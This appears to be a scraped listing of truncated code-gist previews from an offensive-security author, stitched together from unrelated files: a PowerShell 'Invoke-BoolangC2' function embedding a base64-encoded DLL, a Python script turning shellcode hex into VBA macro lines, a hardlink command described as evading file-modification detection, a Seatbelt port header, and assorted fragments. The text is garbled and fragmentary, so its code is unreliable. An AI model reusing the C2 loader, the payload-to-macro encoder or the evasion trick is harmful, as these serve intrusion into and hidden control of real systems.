| #! /usr/bin/env python3 | |
| # | |
| # Requires Python 3.7+ & aiohttp (speedups recommended) | |
| # pip3 install aiohttp[speedups] | |
| # | |
| import sys | |
| import asyncio | |
| import aiohttp |
| /* | |
| This is a complete port of @Harmjoy's Seatbelt tool to Boolang | |
| All credit goes to him for writing this beast | |
| https://github.com/GhostPack/Seatbelt | |
| */ |
| function Invoke-BoolangC2 | |
| { | |
| $BooLangDLL = @' | |
| vH0HfJRF+v/MvJvdzW4CbMpuIEBCCSyhBQiwJIGEZkGwYCEBC1UBlcUEEAiL9BAICIiKqKiIDVE5KyBnRUVFxXY2sJ9nO8/zvDvvzh/+nzJv2d0k5F/uz4c8+37nmfrMM8+Ud2becRM3CUMI4YK/334TYp/gfxXi5P+WwV+rvAOtxKOpr3XaJ8e+1um8mbNq8udWRy+rnnJl/rQpc+ZE5+VPnZFfPX9O/qw5+aPOOjf/yuj0GX3S031ddRxnjxZirDTi4v1UqE5+6RUiSwnhZbePB8BzPmZMce7wWXG+hbB/xTJF7kvTDChXxWoh2tB/+9f6oX+bIN4zBMfrdYnkf5OVSGuBLJL+5VtZp39ewKc5cJ95MxbOg98vM3W5sjjfCVFM7lNdUz0Nw7s4j8INv8F4jxXwv0/1jCui4DFN55niap/kb0RiNp8ZwH4wb0qkiPPeFiIyWYrUBH/vvMX1fbJ/mUVStIJfKURALAXq8kXQ3V0oRC7wusbzhFqGv0Y0qqBkxylVNzmJY4WyDebJIzLbcXZmq5oUIXwxrHYVBkFAcCMGuuMqhHQNUUhlEAFV68K43X61BB88RhhcffMg1lx3GGhPn9tT8fFvv/1WKE4SztVkuFwI9waEM7AsqhazdBSec8MeCJIholD3viFYGe670Nkf2YUlYI9RKI0v6gOSHhkErhlG2A8gzTsfvQ7pYvu0o/RG05ByZMcncKh0cCp5CjJ0vBU5nAiCfHKjAHzHVC0KBsQqema6Aq4GijqEMduRamd8dgdcfqooT6FguZeKsXVUlSSjUWYFG65oa0w2A56rQShzXUYY/PtqAkAWc7bBD+aW5UlS4EdXFEL5CofZlZeClZdZpMQpgtpwAL2ioz+YFsnD7Hi3+9zz3Zh5liY+pkfawrM3VJnm9WycVf4+SCBLMzCLqYVjVE1H1BS3pSmFF0DEbspbTRaKPxtIt0LSV8Cg+VSP6C |
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| using System.Collections; | |
| using System.Collections.Generic; |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
| FROM debian:latest | |
| ENV USERNAME byt3bl33d3r | |
| ENV PYTHON_VERSION 3.8.1 | |
| ENV GOLANG_VERSION 1.13.5 | |
| ENV GO_REL_ARCH linux-amd64 | |
| ENV LANG C.UTF-8 | |
| ENV GOPATH $HOME/go | |
| ENV PYENV_VIRTUALENVWRAPPER_PREFER_PYVENV "true" |
| import binascii | |
| import sys | |
| import io | |
| def gen_line(hex_string): | |
| return f"b = b & \"{hex_string}\"\n" | |
| with open(sys.argv[1], "rb") as asm: | |
| asm_hex = io.StringIO(binascii.hexlify(asm.read()).decode()) | |
| vba = "Dim b As String\n" |
| # All output will be logged in /var/log/apache2/error.log | |
| import logging | |
| from cgi import parse_qs, escape | |
| logging.basicConfig(format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s', | |
| datefmt='%H:%M:%S', | |
| level=logging.DEBUG) | |
| def application(environ, start_response): |
| import xmltodict | |
| from contextlib import ContextDecorator | |
| """ | |
| with NessusParser("path/to/dotnessusfile.nessus") as parser: | |
| for url in parser: | |
| print(url) | |
| """ | |
| class NessusParser(ContextDecorator): |